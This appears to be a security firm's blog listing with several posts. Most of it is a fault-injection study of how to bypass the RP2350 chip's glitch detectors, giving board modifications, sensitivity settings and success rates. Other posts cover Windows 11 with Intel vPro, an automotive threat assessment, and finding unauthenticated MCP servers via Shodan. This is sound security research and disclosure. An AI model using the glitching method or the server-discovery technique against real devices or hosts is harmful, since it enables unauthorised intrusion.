INSIGHTS | July 31, 2025

Characterizing the Raspberry Pico 2 FI countermeasures – Part 1

Let’s start by saying that the Pico 2 – or more specifically, the RP2350 MCU – is an impressive chip. It’s powerful, packed with peripherals and features (I love the PIO!), easy to use and develop with, and from a security standpoint, exceptionally well designed.

After more than 10 years in chip security evaluations, I can confidently say that the RP2350 might be one of the most secure general-purpose, off-the-shelf MCUs on the market. I’ve evaluated enough chips to recognize when a system-on-chip (SoC) was designed with security in mind from the very beginning – integrating protection mechanisms early in the design phase – versus when security is treated as an afterthought, patched in late just to meet the minimum requirements. There’s no doubt: security was a top priority during the development of the RP2350.

The Raspberry Pi Foundation, clearly confident in their product, launched a bug bounty program offering €10,000 to the first person who could extract a secret stored in the Pico 2’s fuses. After a month without any successful claims, they doubled the reward to €20,000. To my knowledge, this is the first time a silicon developer has offered such a bounty – a commendable move.

That confidence is rooted in the chip’s well-engineered Secure Boot process and an effective glitch detector – both of which were tested extensively for months by two independent security firms prior to release. Still…it’s not perfect.

In January 2025, four winners for the challenge were announced, including IOActive’s Silicon Security team, which uncovered a novel method to invasively extract secrets from the RP2350 antifuse OTP. By leveraging a focused-ion-beam (FIB) microscope with passive voltage contrast (PVC), IOActive demonstrated an attack that challenges the long-standing assumption that antifuses are physically unreadable – posing a serious threat to any secure design that relies on them.

In addition to this invasive technique, this post – and those that follow – will document IOActive’s efforts to use fault injection (FI) to glitch and bypass the security protections of the Pico 2. This article assumes that the reader already has a basic understanding of fault injection. If not, I recommend reading up on the topic before proceeding.

The glitch detector

The RP2350 implements four glitch detectors, described in the datasheet as follows:

The idea behind these detectors is straightforward: the output of two D-latches is XORed to detect differences. If a glitch is injected, it may flip the state of only one of the latches, immediately triggering the detector. To detect glitches that could flip both latches, a delay is inserted in the feedback path of one of the latches. If the glitch flips both D-latches simultaneously, the delayed feedback would force the latches to take on different values on the next clock cycle and the detector would be triggered.

Each of the four detectors can be independently configured via the GLITCH_DETECTOR.SENSITIVITY register or the OTP fuse CRIT1.GLITCH_DETECTOR_SENS. There are four sensitivity levels available, allowing fine-tuned detection based on the expected operating environment.

When a glitch is detected, the GLITCH_DETECTOR.TRIG_STATUS register indicates which of the detectors were triggered. If the glitch detectors are armed – either by writing to the GLITCH_DETECTOR.ARM register or by programming the OTP fuse CRIT1.GLITCH_DETECTOR_ENABLE – a reset is asserted automatically upon detection. In such cases, the HAD_GLITCH_DETECT bit in the POWMAN.CHIP_RESET register is set, indicating that the last reset was caused by the glitch detector.

Interestingly, it’s possible to monitor the output of the glitch detectors without triggering a reset – a feature that proves very useful when characterizing the detectors and tuning glitch parameters during testing.

The fact that the chip includes only four glitch detectors raises an important question: how resilient is this design against localized fault injection? It’s clear that a focused laser fault injection (L-FI) attack should bypass these detectors. This has been demonstrated by the winner of the Pico2 challenge, Kévin Courdesses, who modified an OpenFlex microscope to inject laser glitches.

But what about more common localized FI methods, like electromagnetic fault injection (EMFI) or body-bias injection (BBI)? That’s something we’ll explore in a future post, but Thomas Roth has already demonstrated that such an attack is feasible.

Characterizing the CPU with crowbar glitching

The first step in our evaluation was to assess the CPU’s sensitivity to voltage glitches. For this initial fault injection (FI) campaign, we disabled all glitch detectors – setting the sensitivity level to 0 and not arming them – in order to observe the CPU’s raw behavior without any interference from built-in protections and countermeasures.

For the glitching technique, we opted for crowbar switching, one of the most widely used methods in voltage fault injection. Its popularity stems largely from the simplicity and affordability of the hardware required. However, crowbar switching also offers technical advantages over other voltage glitching methods, which we’ll discuss later. In future posts, we’ll also cover results obtained using a DAC to generate voltage glitches and compare the two approaches in terms of effectiveness and control.

To inject the glitches, we used a tool called Glitch.IO. This tool is an in-house development based on the Raspberry Pi Pico, like many other glitchers, but with several unique features not previously seen in similar tools. Some of these unique features will be introduced throughout this series of posts. The Glitch.IO will be released as open hardware soon during Black Hat USA 2025.

Modifying the Pico2 board

Before performing glitching experiments on the Raspberry Pi Pico 2, we first needed to modify the board to isolate the CPU power plane and remove its associated capacitance.

According to the datasheet (see Figure 3), the RP2350 features five power supply domains. However, only one is relevant for our purposes: DVDD – the 1.1V rail that powers the CPU core. This is the supply line where we’ll be injecting our glitches. The remaining power supplies operate at 3.3V and are not initially of interest for this stage of testing.

To reduce the bill of materials (BOM) and facilitate the PCB design, the RP2350 chip has an integrated Switched-Mode Power Supply (SMPS ) that can generate the 1.1V from the 3.3V rail.

Referring to the Raspberry Pi Pico 2 schematics (available as an annex in the datasheet), we identified the decoupling capacitors on the DVDD power plane: C9, C11, and C12. These were removed to reduce the capacitance on the DVDD line, making the PCB more susceptible to glitches. Additionally, since we plan to perform DAC-based glitching and supply custom voltage profiles to the core, we had to isolate the DVDD pins from the SMPS output. To do this, we cut the trace connecting the 1.1V line to VREG_FB, effectively decoupling the internal regulator. We then supplied power directly to the DVDD rail using test point TP7 and an external power supply. 

Figure 4 shows all of the modifications done in the schematic, and Figure 5 shows those modifications on the PCB.

The test application

To characterize the target, we developed a standard “for loop” test application, shown in Figure 6, that will run on the Raspberry Pico 2. Before entering the loop, the glitch detectors are configured. After the loop is completed, the application prints the status of the detectors.

The goal of this fault injection (FI) campaign is to determine the optimal glitch parameters that can disrupt the execution of the loop without triggering the glitch detectors.

The glitch application

The glitching tool must run an application responsible for four key tasks:

                  1. Preparing the target device for glitching

                  2. Waiting for a trigger

                  3. Injecting the glitch

                  4. Evaluating the target’s response and the glitch’s effects

The Glitch.IO SDK simplifies the development of such applications. It provides a collection of modular classes designed to abstract and streamline the glitching process:

  • Glitchers: Implement different glitching techniques, such as crowbar, DAC-generated glitches, clock glitches, reset glitches, and MUX switching.
  • Triggers: Define how glitches are synchronized, supporting a variety of trigger sources (e.g., GPIO rise/fall, reset lines, UART RX/TX).
  • Protocols: Implement generic communication protocols like SWD, JTAG, etc.
  • Targets: Define the specific attack or test logic – for example, attacking secure boot, bypassing debug protections, or characterizing glitch sensitivity.

These components are instantiated and combined to form a “recipe” – an application that implements a specific attack on a specific device. Figure 7 represents the software architecture of a Glitch.IO application, and the following code shows the recipe used to characterize the Raspberry Pico 2.

In this recipe, glitch parameters and their variation strategies are defined in initializeParameters(). In main(), we instantiate and wire together the glitcher, trigger, and target components.

The Glitch.IO SDK also includes example recipes for common FI attacks against popular MCUs from vendors like NXP and ST – making it easy to get started with real-world targets.

The FI campaign

The glitch detectors in the RP2350 can be configured at four different sensitivity levels. For each level, we ran a series of FI campaigns: starting with broad glitch parameter sweeps and then progressively narrowing them down in an attempt to maximize the success rate – defined as glitches that disrupt execution without being detected.

Throughout the campaigns, we logged two key outcomes:

  • Whether the glitch was successful (i.e., it altered the behavior of the for loop).
  • Which glitch detectors, if any, were triggered.

All tests were performed using an external 1.1V power supply, and the chip was reset after each glitch attempt to ensure a consistent starting state.

During testing, the injected glitches produced a variety of observable effects. We classified the results into the following categories:

  • Normal: The glitch had no observable effect on chip behavior.
  • Reset: The glitch caused a system crash or full reset.
  • Success: The loop counter was altered, but no glitch detectors were triggered.
  • Detected 1–4: The loop counter was altered, and one to four glitch detectors were triggered, respectively.
  • Unknown: The device printed unexpected characters, suggesting some level of corruption.
  • Error: Any other unclassified or abnormal behavior.

The following sections summarize the results of the fault injection characterization campaigns, organized by glitch detector sensitivity level.

Sensitivity Level 0 (glitch_detector_hw->sensitivity=0xDE00FF00)

The following sections summarize the results of the fault injection characterization campaigns, organized by glitch detector sensitivity level.

Sensitivity Level 0 (glitch_detector_hw->sensitivity=0xDE00FF00)

At this lowest sensitivity level, the glitch detectors are effectively disabled – they seemed to not be functional and could not be triggered. This allowed us to focus purely on the CPU’s sensitivity to glitches without interference from detection mechanisms.

We conducted three separate FI campaigns at this level, progressively narrowing the glitch parameters (e.g., delay and length) to identify the most effective combinations.

Figure 8 shows the plots of the glitch results. A clear boundary is visible between the green and yellow zones: this is where the glitch becomes too long or powerful, consistently crashing the target. The red points appear along this boundary, but only at specific delay values – those that align precisely with the execution of the instruction that when glitched breaks the loop. This correlation provides strong insight into the CPU’s timing sensitivity and the ideal glitch injection window. The highest success rate achieved was almost 14%.

The following tables summarize the results for these campaigns:

LEVEL 0 (glitch_detector_hw->sensitivity=0xDE00FF00)

Sensitivity Level 1 (glitch_detector_hw->sensitivity=0xDE00AA55)

At this sensitivity level, the glitch detectors were still unable to detect any of the injected glitches. The results were largely indistinguishable from those observed at Sensitivity Level 0.

Due to the lack of significant behavioral differences, only a single short campaign was conducted at this level to confirm the similarity. No glitches were detected, and successful fault injections continued to occur under the same timing and voltage conditions as before.

The following tables summarize the results for this campaign:

LEVEL 1 (glitch_detector_hw->sensitivity=0xDE00AA55)

Sensitivity Level 2 (glitch_detector_hw->sensitivity=0xDE0055AA)

This is the first sensitivity level at which the glitch detectors were successfully triggered by our fault injections. However, it was still relatively easy to bypass the detectors under certain conditions.

In the plot shown in Figure 10, additional colors indicate the number of detectors triggered during successful glitches – that is, glitches that broke the loop logic but:

  • Blue: 1 detector was triggered
  • Magenta: 2 detectors were triggered
  • Cyan: 3 detectors were triggered
  • Purple: All 4 detectors were triggered

To improve clarity, a second version of the plot is included, where green (normal glitches) and yellow (reset events) have been removed, making it easier to focus on detection behavior.

A success rate of nearly 7% was achieved in this campaign – relatively high, considering this was the third level of sensitivity. These results suggest that while detection is now functional, the protection can still be bypassed with a well-timed and well-parameterized glitch.

The following tables summarize the different campaigns conducted at this sensitivity level and their respective outcomes.

LEVEL 2 (glitch_detector_hw->sensitivity=0xDE0055AA)

Sensitivity Level 3 (glitch_detector_hw->sensitivity=0xDE0000FF)

At this highest sensitivity level, the glitch detectors become very effective. Although we were still able to achieve some successful glitches, the success rate dropped significantly.

An initial campaign using broader parameters resulted in a small number of successful glitches. A second campaign attempted to narrow the parameter range based on what had worked at Sensitivity Level 2 but yielded no successful results. In hindsight, this was likely due to insufficient glitch attempts.

A third and final campaign expanded the narrowed parameter range slightly and achieved a modestly improved success rate. However, even then the rate was only about 0.0002%, indicating that the detectors are highly effective at this level.

One interesting observation is that while at Sensitivity Level 2, many glitches triggered only one, two, or three detectors, at Sensitivity Level 3, glitches almost always triggered all four detectors.

The following plots show the two campaigns with broader parameters. In the right-hand plots, green and yellow dots are removed to better highlight successful red points.

Additional campaigns (not included in this article) attempted to further refine parameters around previously successful glitches, but did not yield any improvement in the success rate. 

The following tables summarize the results for the three campaigns conducted at this sensitivity level.

LEVEL 3 (glitch_detector_hw->sensitivity=0xDE0000FF)

Conclusions

Our experiments demonstrate that the RP2350’s glitch detectors are highly effective – but only when configured at the highest sensitivity level. At Sensitivity Levels 0 and 1, the detectors provided no meaningful protection. Sensitivity Level 2 reduced the success rate significantly, but not enough to prevent a fault injection (FI) attack (almost a 7% success rate).

Even at Sensitivity Level 3, it was still possible to glitch the RP2350, albeit with a very low success rate of approximately 0.00016% – or roughly one successful glitch every 625,000 attempts. Given that our setup could inject glitches at around 30 attempts per second, this translated to an average attack time of under six hours to achieve a successful result.

However, it’s crucial to place these results in context to properly evaluate the real-world risk of using the RP2350 in a security-critical application.

All experiments were conducted under ideal lab conditions:

  • Full control over the target
  • Precise and reliable trigger signals
  • Fast reset cycle
  • A test application that executes the vulnerable instruction repeatedly, every few clock cycles

These ideal conditions greatly increased our odds of success. In contrast, a real-world attack would face substantial challenges:

  • Limited or no access to CPU internals
  • Unreliable or noisy trigger sources
  • Potentially long and variable reset/restart times
  • Application code that executes sensitive operations infrequently or unpredictably

Introducing software countermeasures – such as instruction-level redundancy or random delays – would further reduce the success rate, often requiring multiple or perfectly timed glitches. Under such constraints, an attacker may require several months to mount a successful attack using crowbar-based glitching alone.

In future articles, we’ll explore whether the same conclusions hold for other glitching techniques, such as DAC-generated glitches or electromagnetic fault injection (EMFI).

WHITEPAPER | July 29, 2025

Windows 11 Upgrade – The Hardware Security Focused Refresh

Windows 10’s End of Life (EoL) is slated for October 14th, 2025. After this date, it will no longer be supported, and businesses are expected to upgrade to Windows 11; however, this upgrade is entirely unlike previous Windows upgrades in that strict hardware requirements are needed to support Windows 11. The transition from Windows 10 to Windows 11 represents a major inflection point for enterprise IT and SecOps, the hardware requirements are there to help with overall cybersecurity, as Windows moves from a primarily software security model to a best-of-both-worlds hardware and software model. In this blog post we discuss in detail the benefits of such upgrade through Intel vPro®. This work is part of the research IOActive published in a recent white paper, which was commissioned by Intel®.

IOActive works closely with both Microsoft and silicon security vendors. In this blog post, we focus on how PCs powered by Intel® Core™ Ultra processors and Intel vPro® offer a compelling strategy for Windows 11 upgrades.

Windows 10 was launched in 2015 with a comprehensive software-based security feature list,[1] including Windows Defender Antivirus, Windows Firewall, and data encryption technologies like BitLocker. However, software-based solutions can only take you so far in protecting data and systems and can still be vulnerable to sophisticated malware, zero-day attacks, and other Advanced Persistent Threats (APTs).

Windows 11, shifts focus from software-only to a best-of-both-worlds software-and-hardware-based security solution.[2] Providing a more robust, tamper-resistant security posture, helping ensure “secure by default” and “secure by design” principles.

Modern Copilot+ PCs, such as those powered by Intel Core Ultra Processors (200v Series), are built with security at their foundational level. At the heart of this enhanced security is the Microsoft Pluton security processor.  Enabled by default, Pluton is designed to protect sensitive assets like credentials, encryption keys, and user identities by isolating them from potential attackers, even if they gain full access to the system.

Taking this to the next level, Microsoft designed Secured-core PCs to provide an “On-By-Default” security for businesses and users to provide three core pillars of protection:

  • Protecting identities from external threats
  • Securing the operating system from malware
  • Defending against hardware and firmware attacks

To properly support these secure pillars, specific hardware security requirements are necessary.

Microsoft Secured-core PCs are designed to provide an extra layer of protection against firmware, hardware, and software attacks offering three tiers of protection

These baseline security features are essential for SecOps teams aiming to reduce attack surfaces and ensure system integrity:

  • Secure Boot to block malicious code during startup.
  • TPM 2.0 for secure credential and key storage.
  • Hypervisor Code Integrity (HVCI) Capable (Memory Integrity) for kernel-level code integrity.

To meet the enhanced hardware security requirements, all of the standard hardware security features must be enabled as well as HVCI.

  • HVCI enabled, enforcing runtime code integrity to block advanced exploits

For organizations with high security requirements, these advanced capabilities offer deeper resilience:

  • Dynamic Root of Trust for Measurement (DRTM) to verify integrity during the boot process.
  • System Management Mode (SMM) Protection to isolate critical system functions from the OS.

This multi-tiered model helps enterprises align endpoint protections with their specific risk profile and compliance needs.

Inside Intel vPro

Intel vPro systems are built for enterprise environments requiring robust security, high performance, and strong manageability. They deliver over 30 hardware-enabled protections that extend Windows 11’s security model,

01. Out of Box – Security at First Boot

Every Intel vPro-based system with Windows 11 ships with essential security features pre-enabled. This “secure by default” approach ensures rapid deployment without sacrificing protection,

02. Intel vPro Surpasses Microsoft Secured-core PC L3 Requirements

Intel vPro goes beyond even the higher requirements of Secured-core PC, with additional security features and services to help SecOps teams with the deployment and support of their hardware fleet.

  • Intel Total Memory Encryption – Multi-Key (TME-MK) helps prevent data exposure from physical memory attacks..
  • Intel Virtualization Technology – Redirect Protection (VT-rp) Strengthens isolation in multi-tenant and hybrid environments.
  • Intel Threat Detection Technology (TDT) Provides AI-driven detection of advanced threats like ransomware..
  • Intel Active Management Technology (AMT) – BSOD Recovery Enables remote remediation even after crashes..
  • Intel Innovation Platform Framework (IPF) – Device Discovery offers real-time visibility into device configurations and status.

Deploying Intel vPro-based systems with Microsoft Pluton on Windows 11 ensures your business is not only compliant but also strategically prepared for tomorrow’s cybersecurity challenges. This is more than just protection; it’s long-term operational resilience.

03. Third-Party Assessed for Compliance

These capabilities are third-party validated against compliance standards such as NIST SP800-193, SP800-147, and SP800-155, easing audit and certification processes for industries like healthcare, finance, and government.

04. Industry Driven Validation Earlier this year, in collaboration with Microsoft, CrowdStrike, and AttackIQ, Intel mapped and ranked the hardware-optimized software security features against MITRE ATT&CK framework using the full set of Intel vPro security protections, some 30 hardware features, on a typical enterprise security software stack. This provided, in total, 90 hardware mitigations against real-world attacks when using Windows 11 and Windows Defender.

05. Achieve Enterprise-Class Security Posture

Together, Intel vPro and Pluton form a layered defense strategy that empowers IT leaders to confidently enforce zero-trust architectures, ensure business continuity, and scale securely in hybrid or cloud-native environments.

Conclusion

Upgrading from Windows 10 to Windows 11 is more than a user experience refresh, it’s a strategic opportunity to modernize your organization’s security architecture. With built-in protections Windows 11 sets a new baseline for device security.

For enterprises, the transition brings a clear advantage: by pairing Windows 11 with Intel vPro, organizations can go beyond compliance and exceed Secured-core PC requirements with hardware-enhanced capabilities like Intel TME-MK, Intel VT-rp, Intel TDT, and Intel AMT. These features offer operational benefits for SecOps teams, from accelerated recovery and advanced threat detection to improved device visibility and remote manageability.

This transition offers a rare out-of-the-box uplift for security and IT teams, delivering stronger protection without the complexity of traditional large-scale security projects.

Download our free white paper for more technical background around this mandatory update. 


[1] https://learn.microsoft.com/en-us/windows/security/threat-protection/overview-of-threat-mitigations-in-windows-10

[2] https://www.microsoft.com/insidetrack/blog/hardware-backed-windows-11-empowers-microsoft-with-secure-by-default-baseline/

CASE STUDY | July 14, 2025

Accelerating Threat Assessment in Vehicle ECUs

A global automaker required a thorough, but time-constrained, threat assessment and remediation plan for its critical Gateway Electronic Control Unit (ECU). The assessment needed to cover not only the main ECU but also its networked interaction with all of the vehicle’s numerous ECUs.

Having attempted to perform the assessment on its own, the manufacturer found its initial results lacked sufficient technical depth and were taking too long to report, threatening other key project timelines. They turned to IOActive to not only improve but also to accelerate the assessment process for this product.

The Challenge

An automotive Gateway ECU acts as a hub, routing and securing communication between ECUs and back-end services, such as the engine, transmission, brakes, steering, and infotainment. However, because it sits atop the vehicle’s digital nervous system, any compromise of the Gateway ECU can cascade to other subsystems through the entire in-vehicle network, including the Controller Area Network (CAN) bus and newer technologies like vehicular Ethernet. This widespread connectivity amplifies the potential for catastrophic results if vulnerabilities are exploited. Ensuring that any conceivable threats are accounted for and prioritized for remediation is a critical step in overall vehicle safety in the modern era.

In this case, the automaker was looking to certify the reliability and security posture of its Gateway ECU in accordance with ISO/SAE 21434, the international standard that specifies requirements for cybersecurity risk management in the design and development of automotive systems. The purpose of ISO 21434 is to establish a comprehensive framework for managing cybersecurity risks throughout the entire lifecycle of a vehicle, and ensure that automotive systems are designed with cybersecurity in mind from the outset, continually addressing potential vulnerabilities and threats.

ISO 21434 applies to all stages of a vehicle’s lifecycle, including concept, development, production, operation, maintenance, and decommissioning. It covers all electronic and electrical systems within the vehicle, including software, hardware, and communication interfaces.

Enter TARA

A critical component of ISO 21434 is a risk assessment process known as Threat Analysis and Risk Assessment (TARA). A TARA’s risk-based approach involves systematically identifying potential damage scenarios, threat scenarios, and attack paths, evaluating their impact and attack feasibility, and determining the risk to decide appropriate mitigation strategies.

Given their tight project timelines, what the automaker needed was a specialized consulting service with core competencies focused on the use of TARA in an automotive system. That’s where IOActive comes in, as a research-driven security services company with a history of automotive testing and ethical hacking that dates to the earliest days of digital vehicle control systems.

In the context of automobile control systems, a meaningful TARA program is structured to ensure all potential security risks are identified, assessed, and prioritized for mitigation. Potential vectors include physical threats (when a malicious actor has hands-on access to a vehicle, for example) and wireless threats (for hacking attempts leveraging the vehicle’s on-board cellular and WiFi connectivity).

For this automaker client, IOActive organized the highly technical TARA to include the following tasks.

Initiation and Planning

  • Defining scope: Clearly outlining the scope of the TARA, specifying which systems, components, and interfaces related to the vehicle Gateway ECU are to be included.
  • Establishing objectives: Setting the goals for the TARA, such as agreeing on impact rating, attack feasibility, and risk calculation details, understanding the client’s concerns or key areas of focus, and establishing initial assumptions about the item along with the process for confirming and documenting any assumptions needed during the execution of the TARA.
  • Assembling the team: Forming a multidisciplinary team with expertise in cybersecurity, automotive systems, threat modeling, TARAs, software, hardware, and relevant regulatory standards (e.g., ISO 21434).

Asset Identification (Section 15.3)

  • Discovery: Determining and defining critical assets within the item, by reviewing the software modules, hardware components, data flows, dependencies, and communication interfaces.
  • Damage scenarios: Determining if a compromise of a cybersecurity property of any asset would cause some form of harm to the road user.

Threat Scenario Identification (Section 15.4)

  • Identifying threat sources: Cataloging potential sources of threats, such as external attackers, malicious insiders, and natural events.
  • Enumerating threat scenarios: Developing threat scenarios to describe how each identified damage scenario can be exploited in the item.

Impact Rating (Section 15.5)

  • Impact analysis: Evaluating the potential impact of each damage scenario on the vehicle’s safety, as well as financial, operational, and privacy impacts. This includes both direct and indirect consequences.   

Attack Path Analysis and Attack Feasibility Rating (Section 15.6 and 15.7)

  • Attack path generation: Building a series of steps that could be used to realize a threat scenario that would result in damage. The standard doesn’t specify how this is done, but IOActive breaks attack paths into the following steps:
    • Primary Attack (Intrusion Vector)
    • Secondary Attack (Escalation Vector)
    • Tertiary Attack (Lateral Movement Vector)
    • Final Attack (Exploitation Phase)
  • Attack Feasibility Rating: Assessing the likelihood of each attack path occurring based on factors such as existing security measures, ease of exploitation, and known attacker capabilities

Risk Value Determination (Section 15.8)

  • Risk scoring: Assigning risk scores to each valid attack path based on the combined assessment of impact and attack feasibility. This helps prioritize the threats.
  • Risk categorization: Categorizing the risks into different to help facilitate the client’s risk treatment decision-making.

Risk Treatment Decision (Section 15.9)

  • Developing mitigation strategies: Proposing specific measures to mitigate the identified risks. This can include technical controls (e.g., encryption or authentication), process changes (e.g., regular security updates), and organizational measures (e.g., training or policy changes).
  • Residual risk assessment: Guidance on assessing the residual risk after implementing the mitigation measures to ensure that risk is reduced to acceptable levels.

Documentation and Reporting

  • Comprehensive documentation: Maintaining detailed documentation of the TARA process, including all damage scenarios, threat scenarios, and steps that form attack paths.
  • Reporting: Preparing reports for key stakeholders that summarize the findings, any actions taken, proposed future actions for the client, and the item’s current security posture.

The Assessment in Depth

Adhering to this systematic implementation of the TARA methodology, IOActive’s security consultants began with the detailed documentation review required to expose potential attack vectors that malicious actors could exploit. This process is much like a threat model, in which. our team identified potential risks and lack of controls, ranging from weak encryption practices to inadequate access controls and insecure communication protocols. Each weakness was examined in depth to help identify areas of potential risk to vehicle functionality, safety, and privacy.

Over the course of the two-month TARA process, IOActive’s automotive security team discovered multiple high-impact risks:

  • The automaker’s control systems did not currently support intra-ECU authentication and authorization. These missing controls could allow an attacker to wreak havoc across multiple vehicle systems based on a single compromise of a lower-value component.
  • The vehicle’s communications and control networks also lacked appropriate segmentation, which, like the authentication and authorization issue, could facilitate an attack on multiple ECUs from a single point of compromise.
  •  Access to the cryptographic material used by the ECU was poorly understood and documented. This has the potential to complicate the assessment of system impact and identification of compromised keys in the event of an attack.

Throughout the course of the TARA engagement, IOActive’s expert consultants kept in constant contact with the client, asking probing questions about development and architecture that spurred the automaker’s own technical team to revisit core component security questions — and consider strategic changes to its products — with company decision makers.

The Results

IOActive completed the TARA within an impressive two-month timeframe, delivering results that surpassed those typically achieved by internal teams or other vendors. Leveraging our extensive experience across a diverse range of vendors and OEMs, IOActive provided the automaker with a detailed, realistic, and actionable roster of risks, each analyzed with significant technical depth and prioritized by practical risk level. Our experts’ broad spectrum of exposure enables a more thorough and insightful threat assessment, helping to ensure that potential security gaps are not overlooked.

The findings included not only proposed mitigation strategies but also an evaluation of their expected effectiveness in addressing each identified security gap. This comprehensive report offered the client a robust set of risks specific to their gateway ECU and a clear roadmap for mitigating them efficiently. Additionally, the TARA conducted by IOActive was a crucial step towards achieving ISO 21434 compliance, reinforcing the vehicle’s overall security posture with unmatched precision and speed.

INSIGHTS | June 24, 2025

Smarter Security, Leaner Budgets: IOActive & SERJON’s Approach to Cyber Optimization

Guest blog by Urban Jonson, SERJON
with John Sheehy and Kevin Harnett

During my recent presentation at ESCAR USA, I shared findings from my latest research on the automotive industry’s adoption of Threat Analysis and Risk Assessment (TARA) processes to develop cybersecurity artifacts that align with regulatory requirements. The automotive TARA is a systematic process used to identify potential cybersecurity threats to vehicle systems, evaluate their likelihood and impact, and determine appropriate mitigations to reduce risk to acceptable levels.

One key insight derived across numerous TARA exercises is that many organizations struggle with consistency and accuracy in their internal cybersecurity documentation. To address this, I recommend thoroughly analyzing the workflows involved in creating, reviewing, and approving such documentation. By applying business process reengineering principles and best practices, organizations can streamline and strengthen these workflows.

These findings also highlight a broader pattern that we have observed across the gamut of industries, from automotive to energy to software development, and all points in between.

In our experience working with companies of all sizes and types, one challenge keeps coming up: cybersecurity operations are becoming more expensive, but not necessarily more effective. Too often, we see teams overwhelmed by alerts, buried in redundant tools, and unsure whether their efforts are aligned with real threats. If this sounds familiar, there’s a better way to approach it—one that blends deep knowledge of threat behavior, innovative process design, and focused spending. And yes, sometimes it means bringing in an outside perspective like ours to get things moving in the right direction.

Starting with Real Threat Intelligence: TTPs

When we start working with a company, one of the first things we look at is how well its cybersecurity efforts align with actual risks. We use industry-specific TTPs—Tactics, Techniques, and Procedures used by real attackers in that sector—to uncover what’s really at stake. For example, in finance, phishing and credential theft are huge; ransomware targeting OT environments is more common in manufacturing.

This isn’t just threat modeling, it’s about making sure the company’s cybersecurity operations are focused on what matters. We’ve seen companies spend big on fancy cybersecurity tools that protect against unlikely scenarios, while overlooking common, costly vulnerabilities. TTPs help us steer the conversation toward high-impact areas that deserve real attention.

Reengineering Cyber Processes That Drag Companies Down

With those threat patterns in mind, we conduct a process analysis to map the way cybersecurity workflows actually operate inside the business. Are patching cycles too slow? Are incidents managed the same way across departments? Are cybersecurity tools overlapping or underutilized?

This is where business process reengineering comes in. We work with teams to strip away complexity, redesign inefficient workflows, and introduce automation or clear accountability where needed. The goal is simple: make the company’s cybersecurity operations faster, smarter, and cheaper without compromising protection.

And we get it—internal teams are often too close to the process to spot the friction. That’s why companies bring us in. We bring an external lens, ask the hard questions, and get everyone aligned on a working strategy.

The Eisenhower Matrix: A Surprisingly Useful Budget Tool

Once we’ve got processes in better shape, it’s time to review technology spending. One of the tools we like to use is the Eisenhower Matrix, which enables us to categorize every cybersecurity investment:

  • Urgent and Important: Must-haves, like tools protecting your most targeted assets
  • Important but Not Urgent: Strategic efforts, like employee training or improving logging infrastructure
  • Urgent but Not Important: Fire-drill requests that burn budget but add little value
  • Neither Urgent nor Important: Legacy tools collecting dust (and invoices)

This simple framework helps leadership make clearer, faster decisions, and we help drive those conversations with data and context.

Why Bringing in a Consultant Helps

You might wonder, “Why bring in an outside firm to do this?” The answer is that a security consultancy with seasoned experts offers speed, experience, and perspective. We’ve worked with multiple industries, seen common patterns and pitfalls, and can move faster than most internal teams alone. We’re not here to replace your cybersecurity team; our job is to make them more effective.

If you’re serious about reducing costs, boosting productivity, and ensuring your cybersecurity efforts match your business needs, let’s talk. A little outside perspective might be just what your company needs to move forward with clarity and confidence.

Urban Jonson is a co-founder of SERJON (www.serjon.com) and a frequent collaborator with IOActive. Urban is a cybersecurity industry leader and serves in multiple advisory roles, including SAE International, TMC, ESCAR USA, CyberTruck Challenge, and as a cybersecurity expert for FBI InfraGard and the FBI Automotive Sector Working Group.

INSIGHTS | June 3, 2025

Better Safe Than Sorry: Model Context Protocol

In this blog post, we’ll delve into the world of the Model Context Protocol (MCP), an open standard designed to facilitate seamless integration between AI models and various data sources, tools, and systems. We’ll explore how its simplicity and widespread adoption have led to a proliferation of servers without basic security features, making them vulnerable to attacks.

Our goal is to raise awareness about the critical need for mandatory authentication in the MCP protocol, and we believe that this should serve as a wake-up call for other standards to follow suit.

The Model Context Protocol: A Primer

The MCP follows a client-host-server architecture, built on JSON-RPC using two transport mechanisms:

  1. Sub-process, using Standard Input and Output,
  2. Independent process, using streamable HTTP or Sever-side Events (SSE).

The protocol standard’s simplicity coupled with its de facto compatibility with existing open- and closed-weight Large Language Models (LLMs) made it an instant hit, with widespread adoption from the open-source community and almost all leading LLM trainers.

As of version 2024-11-05, the MCP standard has already been used in over 4800+ MCP server implementations, according to the MCP.io website. Unfortunately, this version didn’t include an authorization mechanism in its specification, even though the draft version included it as an optional feature.

(MCP Draft – Wayback Machine)

The next version, 2025-03-26, re-introduced the authorization specification as an optional feature yet again.

(Authorization – MCP Specification)

Double-Edged Primitives

By design, the MCP protocol standard mandates servers to publish three fundamental building blocks:

  • Prompts
  • Resources
  • Tools

From a client perspective, these three primitives represent:

  • System Instructions
  • Data Access
  • Function Execution

However, from a malicious perspective, the same three primitives represent:

  • Information Leakage
  • Data Exfiltration
  • Remote Command Execution

As an example of this, Invariant Labs recently published a new MCP attack vector called Tool Poisoning Attacks, which utilizes the three primitives at once to achieve critical vulnerabilities on the host system.

In this attack, the MCP server itself acts maliciously, and as previously mentioned, it is unauthenticated by design, so this will end up as a “wild west” of emerging attack vectors across all AI-integrated systems or services.

A Test Case

To test the impact of such specifications firsthand, we created the following Docker Compose environment. (Note that some information is intentionally redacted to avoid fingerprinting the MCP implementor.)

Version 3.8

We simply ran docker-compose up then fired up MCP Inspector:

This immediately shows us that we can connect to and use the MCP Server without authentication at all:

Additionally, this specific MCP Server provides a tool that executes SQL queries against the Postgres database as functionally expected.

This means we are one step away from exposing our entire database externally by not changing the listening hostname.

The important question here is: Are we ahead of the curve in terms of MCP security or not?

A Quick Exercise: Searching for MCP Servers

To answer the question above, we performed a quick exercise.

  1. We used Grep.app to search GitHub public repositories for MCP servers’ common HTTP headers.
  2. We used these headers as search queries on Shodan.
  3. Bingo!

We discovered two hosts with a public MCP server over HTTP protocol. One of them was already flagged as “compromised” from Shodan, and the other one was publishing n8n, Open WebUI and even Ollama Web Applications before it was apparently taken down.

It is worth noting that Ollama servers – just like MCP servers – are unauthenticated by default and have already had their fair share of remote code execution vulnerabilities (CVE-2024-37032).

The Takeaway: Mandatory Authentication for MCP

In conclusion, we believe that authentication is a mandatory requirement for any standard that involves remote execution of code or sensitive data access. The MCP protocol should require authentication to prevent implementors from claiming full specification compliance while omitting authentication altogether. This will help prevent insecure deployments and ensure the integrity of AI-integrated systems and services.

As the MCP protocol continues to gain traction, we hope this blog post serves as a wake-up call for the community to prioritize security and adopt mandatory authentication.

INSIGHTS | May 20, 2025

IOActive Autonomous and Transportation Experience and Capabilities

AUTONOMOUS AND REMOTE CONTROLLED/ACCESS TECHNOLOGY

